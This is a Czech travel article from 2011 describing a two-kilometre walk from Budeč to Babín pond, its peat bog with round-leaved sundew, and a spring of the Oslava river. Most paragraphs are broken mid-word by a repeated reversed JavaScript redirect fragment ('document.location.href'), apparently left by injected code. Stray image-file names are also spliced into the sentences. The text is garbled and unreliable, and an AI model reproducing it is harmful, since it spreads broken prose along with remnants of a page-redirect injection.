Rainbow page separator

Vycházka k prameni Oslavy a rybníku Babín

Středa, 5. října 2011

Krátkou procházku nenáročným terénem a krásnou přírodou je možné absolvovat v okolí vesnice Budeč na Žďársku. Obec s necelými dvěma s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkami obyvatel se nachází zhruba tři kilometry od Žďáru nad Sázavou. raseliniste-pod-hrazi-rybnika-babinDopravit se do ní lze autem nebo au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusem. Návštěvníky vesnice bezpochyby na první pohled zaujme poměrně nová kaple Panny Marie Sněžné na návsi. Ta nahradila díky sbírce místních původní zchátralou stavbu. Z návsi už mohou lidé vyrazit po silničce severozápadně směrem vzhůru. Zanedlouho se cesta vedoucí z obce napojí na modrou turistickou značku.  Po ní se lidé musejí ubírat směrem k rybníku Babín, přičemž budou ještě několik menších vodních ploch v malebné krajině míjet.

Babínský rybník a jeho okolí, které je součástí Chráněné krajinné oblasti Žďárské vrchy, platí za unikátní lokalitu s výskytem vzácných živočišných i rostlinných druhů. Pod hrází nádrže zájemci najdou rašeliniště, ve kterém lze nalézt i ohroženou masožravou rostlinu rosnatku okrouhlolis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou. Informace o studanka-u-pramene-reky-oslavyrašeliništích, slatiništích a vrchovištích návštěvníkům podá informační cedule pod hrází – zastávka naučné stezky. Vodní plocha a její břehy jsou také domovem mnoha druhů vodního ptactva. Nechybí mezi ním divoké kačeny, volavky, lysky, labutě a podobně.

Podél břehu rybníka stačí pokračovat chvíli po modré turistické značce a brzy se vynoří dřevěný ukazatel. Ten má turisty navést k prameni řeky Oslavy. Přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože se nejedná o pravé prameniště té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to řeky ([„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se údajně nachází v lesích u vsi Česká Mez), mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to určitě s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí za návštěvu.

Studánka je hezky upravená a je u ní také příjemné posezení. Jen pár kroků od pramene se nabízí krásná vyhlídka na rašelinné louky, které Babín obklopují.

Trasa z Budče ke studánce je dlouhá přibližně dva kilometry. Případně ji lze ale o asi čtyři kilometry prodloužit – modrá turistická značka [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž vede lesy až do Žďáru nad Sázavou.